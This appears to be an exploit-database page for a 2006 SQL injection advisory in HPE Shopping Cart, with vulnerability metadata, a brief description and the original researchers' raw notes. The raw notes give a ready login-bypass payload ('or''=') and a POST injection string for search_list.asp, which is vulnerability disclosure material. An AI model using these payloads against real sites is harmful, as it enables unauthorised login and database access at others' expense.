header-logo
Suggest Exploit
vendor:
HPE Shopping Cart
by:
Laurent Gaffié & Benjamin Mossé
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: HPE Shopping Cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: hpe:hpecs_shopping_cart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

HPE Shopping Cart Injection SQL

A vulnerability in HPE Shopping Cart allows an attacker to inject arbitrary SQL commands. This can be done by sending a specially crafted HTTP POST request to the search_list.asp page. The vulnerable parameter is Hpecs_Find, which can be set to a malicious SQL query.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high


login bypass :
username:     'or''='
passwd:       'or''='

injection sql (post) :

http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
 ( or just post your query in the search engine ... )

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-14]